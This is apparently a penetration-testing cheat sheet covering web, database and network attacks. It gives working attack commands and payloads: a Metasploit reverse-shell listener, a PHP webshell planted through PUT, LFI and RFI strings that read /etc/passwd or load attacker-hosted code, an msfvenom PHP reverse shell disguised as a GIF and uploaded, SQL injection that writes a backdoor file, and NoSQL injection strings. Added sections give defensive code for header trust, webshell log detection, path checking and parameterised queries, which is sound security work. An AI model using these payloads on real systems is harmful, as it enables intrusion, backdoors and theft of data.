Finding Exploits
Search Exploit-DB
Kali> searchsploit windows 2003 | grep -i local
To quickly view the exploit
Kali> searchsploit -x ######.py
Search Google
Google> site:exploit-db.com exploit kernel <= 3
Search Metasploit
Kali> grep -R "W7" /usr/share/metasploit-framework/modules/exploits/windows/*
Search Vulners
Vulners Audit
Compiling Exploits
Compile for Windows
Kali> i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
Compile for Architectures
Kali> gcc -m32 -o output32 hello.c    # 32-bit
Kali> gcc -m64 -o output hello.c      # 64-bit
Catching Exploits
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run
Breaking out of Virtualization
Breaking into the Data Centre
VENOM Vulnerability
WebSockets
Hacking with WebSockets HTML5
IPV6
Penetration testing with IPv6
How to pwn things with IPv6
HTTP
Resources
OWASP AppSec Videos
OWASP Testing Guide
Cracking the Lens: Attacking HTTPs hidden attack surface
How I hacked hundreds of companies through their helpdesk
Find what request methods the web server supports
Add the following into your Burp repeater
OPTIONS * HTTP/1.1
...
Send fake IP
Kali> curl --header "X-Forwarded-For: 192.168.1.1" http://$TARGET
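The header above only buys anything when the application trusts X-Forwarded-For from whoever sends it. The following is an added example, not from the original page, of the defensive counterpart: the header is honoured only when the TCP peer is one of our own proxies, and the chain is read from the right so the entry a client wrote itself never becomes the "client IP". The proxy ranges and the admin network are constructed values.

```python
import ipaddress

# Constructed: the reverse proxies / load balancers we operate. Only they
# are allowed to speak for the client via X-Forwarded-For.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8"),
                   ipaddress.ip_network("192.168.100.5/32")]
# Constructed: network whose members may reach the admin interface.
ADMIN_NET = ipaddress.ip_network("192.168.1.0/24")


def is_trusted_proxy(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr, xff_header):
    """Return the address to use for access decisions and logs.

    remote_addr: the TCP peer as reported by the socket.
    xff_header:  the raw X-Forwarded-For value (None if absent). Every proxy
                 appends the address it saw, so the rightmost entries were
                 added by our own infrastructure and the leftmost are whatever
                 the client chose to send.
    """
    if not is_trusted_proxy(remote_addr):
        # Direct connection: any X-Forwarded-For was written by the client itself.
        return remote_addr
    hops = [h.strip() for h in (xff_header or "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            ip = ipaddress.ip_address(hop)
        except ValueError:
            # Malformed entry: stop trusting the chain, fall back to the peer.
            return remote_addr
        if not is_trusted_proxy(str(ip)):
            return str(ip)  # first hop not operated by us is the real client
    return remote_addr


def allow_admin(remote_addr, xff_header):
    """Allowlist check that a client-supplied header alone cannot satisfy."""
    return ipaddress.ip_address(client_ip(remote_addr, xff_header)) in ADMIN_NET


if __name__ == "__main__":
    # The curl above, hitting the app directly: the header is ignored.
    print(client_ip("203.0.113.7", "192.168.1.1"))            # 203.0.113.7
    # Same header, but the request came through our proxy, which appended the peer.
    print(client_ip("10.0.0.2", "192.168.1.1, 203.0.113.7"))  # 203.0.113.7
    print(allow_admin("203.0.113.7", "192.168.1.1"))           # False
```

The same logic applies to X-Real-IP, Forwarded and CF-Connecting-IP: whichever header the proxy sets, the application must know which peers are proxies, otherwise the header is just another user-controlled field.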
Webshells
PHP CMD Shell
Place the following in the body of a PUT request and give it a file name
PUT /directory/shell.php HTTP/1.1
...

<?php
echo exec($_GET['cmd']);
?>
Usage:
http://victim/directory/shell.php?cmd=whoami
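The PUT-then-GET sequence above leaves a distinctive trace in the web server's access log. The following added example (not part of the original page) parses combined-format log lines and flags a successful write of a server-executable file, a later request to such a file with a command-style parameter, and the OPTIONS * probe. The log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (Apache/nginx "combined" format) modelling the
# OPTIONS probe, the PUT of the shell and its first use.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:15:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2024:10:15:07 +0000] "OPTIONS * HTTP/1.1" 200 0 "-" "curl/7.88"
203.0.113.9 - - [12/Mar/2024:10:15:12 +0000] "PUT /directory/shell.php HTTP/1.1" 201 0 "-" "curl/7.88"
203.0.113.9 - - [12/Mar/2024:10:15:20 +0000] "GET /directory/shell.php?cmd=whoami HTTP/1.1" 200 20 "-" "curl/7.88"
10.0.0.5 - - [12/Mar/2024:10:16:00 +0000] "PUT /uploads/report.pdf HTTP/1.1" 403 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Extensions the server would execute rather than serve as data.
EXEC_EXT = (".php", ".phtml", ".php5", ".phar", ".jsp", ".jspx", ".asp", ".aspx", ".cgi", ".pl")
# Methods that can create or rename a file on a misconfigured server.
WRITE_METHODS = {"PUT", "MOVE", "COPY"}
# Query keys webshells commonly read their command from (the usage line above uses "cmd").
CMD_KEYS = {"cmd", "command", "exec", "c"}


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    return d


def classify(entry):
    """Return a list of finding labels for one parsed log entry."""
    findings = []
    parts = urlsplit(entry["target"])
    path, query = parts.path.lower(), parse_qs(parts.query)
    executable = path.endswith(EXEC_EXT)
    if entry["method"] in WRITE_METHODS and executable:
        # 2xx means the server actually stored executable content.
        findings.append("webshell_upload" if 200 <= entry["status"] < 300
                        else "webshell_upload_attempt")
    if executable and CMD_KEYS & set(query):
        findings.append("webshell_command")     # script invoked with a command-style parameter
    if entry["method"] == "OPTIONS" and entry["target"] == "*":
        findings.append("method_enumeration")   # informational: someone asked what we allow
    return findings


def scan(log_text):
    """Return (ip, method, target, [findings]) for every line with at least one finding."""
    results = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            results.append((entry["ip"], entry["method"], entry["target"], findings))
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r)
```

The "webshell_upload" label is the one worth paging on: a 2xx to a PUT of a .php file means the document root is writable through HTTP, which is the misconfiguration, independent of what the file contained. Disabling PUT/DELETE and WebDAV methods on the document root removes the whole class.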
Resources
XXE
Resources
Exploitation: XML External Entity (XXE) Injection
Exploiting a Real-World XXE Vulnerability
Exploiting XXE Vulnerabilities in file parsing
XSS
Resources
XSS Attack: Busting browsers to root
DOM Clobbering
DOM Flow - Untangling the DOM
CORS
Resources
Exploiting Misconfigured CORS
CSRF
Resources
Computerphile: Cross Site Request Forgery
Updating Anti-CSRF Tokens with BurpSuite
SSRF
Resources
What is Server side Request Forgery?
A New Era of SSRF
Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)
Example
Sometimes what appears to be RFI can lead to SSRF, here are some commands to help
# Port scan the internal resources available
Kali> wfuzz -c -z range,1-65535 --filter "l>2" http://$TARGET/proxy.php?path=localhost:FUZZ
# If you find one, dirbust it.
Kali> wfuzz -c -w /usr/share/wordlists/dirb/big.txt --filter "l>11" http://$TARGET:8080/FUZZ
RCE
Resources
Node.js Remote Code Execution as a Service
Exploiting Python code execution in the web
Big List of Naughty Strings
PHP Generic Gadget Chains
Utilizing Code Re-use or ROP in PHP Exploits
Pwning PHP Mail Function for fun and RCE
Server Side Template Injection
Resources
Server Side Template Injection
Server Side Template Injection: RCE for the Modern WebApp
API
Resources
Cracking & Fixing REST APIs
LFI
Resources
Local File Inclusion Testing Techniques
Insecure PHP Functions & their Exploits (LFI/RFI)
LFI and RFI -- The Website Security Vulnerability
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution Advanced Exploitation PROC Shortcuts
Examples
file:///etc/passwd
../../../etc/passwd
php://filter/convert.base64-encode/resource=admin.php
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
php://input            (send the PHP code as POST data)
expect://whoami
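Every payload in the list above is defeated by the same three checks on the include parameter: no stream wrapper or scheme, a canonical path that stays inside the page directory, and a fixed allowlist of names. The following is an added example of that check (not from the page; the base directory and allowlisted page names are constructed), written so each of the payloads above maps to a specific rejection reason.

```python
import os
import re

# Constructed: directory holding the only pages the app may include,
# and the names it is allowed to serve from there.
BASE_DIR = "/var/www/app/pages"
ALLOWED_PAGES = {"home.php", "about.php", "contact.php"}
NAME_RE = re.compile(r"^[A-Za-z0-9_-]+\.php$")


def check_include(requested):
    """Classify a user-supplied include parameter.

    Returns (absolute path, "ok") when the request may be served, otherwise
    (None, reason). Order matters: wrappers are refused before the string is
    ever treated as a filesystem path.
    """
    if "\x00" in requested:
        return None, "null byte"
    if "://" in requested or requested.lower().startswith(("php:", "file:", "expect:", "data:")):
        return None, "stream wrapper / scheme not allowed"
    base = os.path.realpath(BASE_DIR)
    # os.path.join discards base for an absolute input, realpath collapses ../
    # and follows symlinks, so the containment test below sees the true target.
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None, "path escapes base directory"
    name = os.path.relpath(candidate, base)
    # Defence in depth: even inside BASE_DIR, only a fixed set of names is served.
    if not NAME_RE.match(name) or name not in ALLOWED_PAGES:
        return None, "not an allowlisted page"
    return candidate, "ok"


if __name__ == "__main__":
    for p in ("home.php", "../../../etc/passwd", "file:///etc/passwd",
              "php://filter/convert.base64-encode/resource=admin.php",
              "php://input", "expect://whoami", "admin.php", "home.php\x00.jpg"):
        print(repr(p), "->", check_include(p))
```

In PHP itself the equivalent hardening is allow_url_include=Off (blocks RFI), not relying on allow_url_fopen, and resolving the name through an array lookup rather than passing it to include(); the path check above is what that lookup replaces.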
Open Redirects
Resources
Open URL Redirects
RFI
Kali> echo "<?php phpinfo(); ?>" > evil.txt
http://$TARGET/index.php?path=http://$ATTACKER/evil.txt
Padding Oracle Attack
Resources
Automated Padding Oracle Attacks with Padbuster
Arguments
url - first argument is the URL
encrypted - second argument is the encrypted text
blocksize - third argument is the cipher block size in bytes (8 for DES/3DES, 16 for AES), not bits
-cookies - define a cookie to use
-plaintext - plaintext to encrypt
Examples
Kali> padBuster.pl http://$TARGET "ENC-COOKIE-TEXT" 8 \
    -cookies "ENC-COOKIE" \
    -plaintext '{"user":"admin","role":"admin"}'
AWS
Resources
AWS PENETRATION TESTING PART 1. S3 BUCKETS
File Upload
Make a backdoor GIF
# As a note, try to overwrite the magic bytes of your backdoor with a valid image
# so that the check will validate. This includes Content-Type.
# (FFD8FFE0 is the JPEG/JFIF signature; a check keyed on the .gif extension expects a GIF header.)
Kali> msfvenom --list | grep php
Kali> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.237 LPORT=54321 -o evil.php
Kali> echo "FFD8FFE0" | xxd -r -p > evil.gif
Kali> cat evil.php >> evil.gif
Upload From CLI
Kali> curl -X POST \
    -F "field1=test" \
    -F "file=@/home/user/evil.gif" \
    --cookie "cookie" \
    http://$TARGET/upload.php
E-Mail
Resources
How to Bypass E-Mail gateways using common payloads
iSCSI
Resources
An interesting route to domain admin via ISCSI
Databases
MySQL
Resources
SQL Injection
SQLMap tricks for advanced SQL injection
Examples
username'--
1'||'1'<'2
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1; #
AND 1 = 2 UNION SELECT 1,2,3,4,5
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1 union all select 1,2,3,4,load_file("/etc/passwd"),6
1 union all select 1,2,3,4,"<?php ?>",6 into outfile '/var/www/html/backdoor.php'
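The payloads above all rely on the application pasting input into the SQL text. The following added example (not from the page) puts the vulnerable "before" beside the parameterised "after" against a constructed in-memory SQLite table, so the same payload can be seen bypassing one and failing against the other.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table. Passwords are stored in clear only to
    keep the injection point visible; a real app stores a salted hash and
    compares it in code, never in the WHERE clause."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "correct horse battery staple", "admin"), ("alice", "alice-pw", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """The 'before' version: user input is pasted into the SQL text, so a quote
    in the input changes the query's structure (comments out the password
    check, or adds an always-true OR branch)."""
    sql = ("SELECT username, role FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Bound parameters: the driver ships the values separately from the SQL
    text, so a quote in the input is just a character inside the compared
    string and no payload above can alter the statement."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    for payload in ("admin'--", "' OR 1=1 --", "1' or '1'='1"):
        print(repr(payload),
              "vulnerable:", login_vulnerable(db, payload, payload),
              "safe:", login_safe(db, payload, payload))
```

The last two payloads in the list above (load_file and INTO OUTFILE) are MySQL-specific and need the FILE privilege plus a writable, secure_file_priv-permitted path; running the application's database account without FILE and with secure_file_priv set closes that route even where an injection exists.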
MSSQL
Resources
PenTest & Hack MSSQL
SQL Injection Cheatsheet MSSQL
MongoDB
Resources
NoSQL Map
Examples
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
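Most of the payloads above work because a JSON body or an "extended" query-string parser hands the application an object where it expected a string, and that object is passed straight into the query filter. The following added example (not from the page) shows the two checks that stop this: refuse any value carrying a $-prefixed key at any depth, and require credentials to be plain strings, with the password kept out of the query altogether. The bracket-parameter parser is a constructed model of what such query-string parsers do with [$ne]=1.

```python
import json


def contains_operator(value):
    """True if a decoded request value carries a MongoDB operator key ($ne, $gt,
    $where, $or, $comment, ...) at any depth. Such a value must never reach a
    query filter."""
    if isinstance(value, dict):
        return any(str(k).startswith("$") or contains_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False


def validate_login(body):
    """Turn a parsed request body into (ok, filter_or_reason).

    Credentials must be plain strings, so {"$ne": 1}, {"$gt": ""} and a
    bracket-parsed username[$ne]=1 are refused, and the password is never part
    of the query: the user document is fetched by name and the password is
    verified in application code against the stored hash."""
    if contains_operator(body):
        return False, "operator in request body"
    username = body.get("username")
    password = body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return False, "credentials must be strings"
    if not 1 <= len(username) <= 64:
        return False, "username length out of range"
    return True, {"username": username}


def parse_bracket_params(pairs):
    """Constructed model of an 'extended' query-string parser: name[$ne]=1
    becomes {"name": {"$ne": "1"}}. Included so the checks above can be
    exercised on form input as well as JSON."""
    out = {}
    for key, value in pairs:
        if "[" in key and key.endswith("]"):
            top, sub = key[:-1].split("[", 1)
            out.setdefault(top, {})[sub] = value
        else:
            out[key] = value
    return out


if __name__ == "__main__":
    for raw in ('{"username": "admin", "password": "hunter2"}',
                '{"username": {"$ne": 1}, "password": {"$ne": 1}}',
                '{"username": "admin", "password": {"$gt": ""}}'):
        print(raw, "->", validate_login(json.loads(raw)))
    print(validate_login(parse_bracket_params([("username", "admin"), ("password[$ne]", "1")])))
```

The $where and sleep() payloads in the list are string values rather than operators, so this check does not see them; they only matter when the application concatenates input into a JavaScript $where expression. Never build $where from input, and set security.javascriptEnabled: false in mongod.conf so server-side JavaScript is unavailable regardless.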
PBX
Resources
Pentesting VOIP
Introduction to Telephony and PBX
Examples
Kali> svmap $TARGET
Kali> svwar -m INVITE -eSTART-END $TARGET